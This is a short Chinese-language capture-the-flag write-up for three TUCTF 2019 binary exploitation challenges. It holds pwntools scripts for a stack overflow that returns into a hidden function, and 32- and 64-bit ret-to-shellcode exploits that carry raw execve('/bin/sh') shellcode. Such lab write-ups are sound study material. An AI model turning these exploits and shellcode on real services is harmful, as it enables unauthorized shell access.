TUCTF-2019

#write up

這次的 TUCTF 打得有點信心啊

難得來做個 write up

runme

thefirst

一開始沒搞清楚，還在想說要 ret2libc, 但是他是用 printf 做輸出的
有點難leak, 後續做靜態分析後才知道有一個 function 可以直接執行 system

看了下 main 和保護機制

exp code:

from pwn import  *

#io = process("./thefirst")
io = remote('chal.tuctf.com', 30508)
context.log_level = 'debug'

binELF = ELF("./thefirst")
main = 0x0804921f
flag = 0x80491fa
offset = 24
io.recvuntil("> ")
payload = "".ljust(24, '\x90') +p32(flag)

io.sendline(payload)

io.interactive()

shellme32

執行起來是這樣子

保護：

main:

簡單來說就是 ret to shellcode

exp code:

from pwn import *

#io = process("./shellme32")
io = remote("chal.tuctf.com", 30506)
context.log_level='debug'
context.terminal = 'bash'

offset = 40

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
io.recvline()

raw = int(io.recvline()[:-1], 16)

log.info("buffer_address = 0x%x" %raw)

payload = (shellcode + "\x00").ljust(40, "a")  + p32(raw)

io.sendline(payload)

io.interactive()

shellme64

一樣的東西只是改成 64位元的

exp code:

from pwn import *

#io = process("./shellme64")

io = remote("chal.tuctf.com", 30507)

io.recvline()

context.terminal = 'bash'
context.log_level = 'debug'

offset = 40

shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

buf_address = int(io.recvline()[:-1], 16)

log.info("buffer address is 0x%lx" %buf_address)

payload = (shellcode + "\x00").ljust(40, "a") + p64(buf_address)

io.sendline(payload)

io.interactive()